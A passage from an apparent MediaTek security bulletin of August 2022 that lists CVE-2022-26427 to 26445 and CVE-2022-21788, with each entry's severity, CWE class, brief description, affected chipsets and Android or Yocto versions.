In camera isp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6893, MT8167, MT8167S, MT8168, MT8175, MT8185, MT8362A, MT8365, MT8385, MT8666, MT8675, MT8765, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-26427**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6893

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-26428**

Title

Concurrent execution using shared resource with improper synchronization ('race condition') in video codec

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Description

In video codec, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6761, MT6765, MT6771, MT8163, MT8167, MT8173, MT8183, MT8362A, MT8385, MT8695

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-26429**

Title

Improper access control in cta

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-284 Improper Access Control

Description

In cta, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6739, MT6757, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6893, MT6895, MT6983, MT8168, MT8173, MT8185, MT8321, MT8365, MT8385, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21788**

Title

Detection of error condition without action in scp

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-390 Detection of Error Condition Without Action

Description

In scp, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6895, MT6983

Affected Software Versions

Android 12.0

CVE

**CVE-2022-26430**

Title

Access of resource using incompatible type ('type confusion') in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')

Description

In mailbox, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8185, MT8321, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26431**

Title

Improper input validation in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In mailbox, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8185, MT8321, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26432**

Title

Improper input validation in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In mailbox, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8185, MT8321, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26433**

Title

Access of resource using incompatible type ('type confusion') in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')

Description

In mailbox, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8167, MT8167S, MT8168, MT8173, MT8175, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26434**

Title

Improper input validation in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In mailbox, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8167, MT8167S, MT8168, MT8173, MT8175, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26435**

Title

Access of resource using incompatible type ('type confusion') in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')

Description

In mailbox, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8167, MT8167S, MT8168, MT8173, MT8175, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26436**

Title

Improper input validation in emi mpu

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In emi mpu, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6855, MT6879, MT6895, MT6983

Affected Software Versions

Android 12.0

CVE

**CVE-2022-26438**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26439**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26440**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26441**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26442**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26443**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26444**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26445**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

****Vulnerability Type Definition****

Abbreviation

**Definition**

RCE

Remote Code Execution

EoP

Elevation of Privilege

ID

Information Disclosure

DoS

Denial of Service

N/A

Classification not available

****Versions****

**Version**

**Date**

**Description**

1.0

August 1, 2022

Bulletin published.

****Notes****

Information above is generated only at the time of creation of this Security Bulletin. The list of affected chipsets could be not complete. For any further information, device OEMs can reach your MediaTek contact person if needed.

If you want to report a security vulnerability in MediaTek chipsets or products, please go to Report Security Vulnerability page on MediaTek website.

Tag

#rce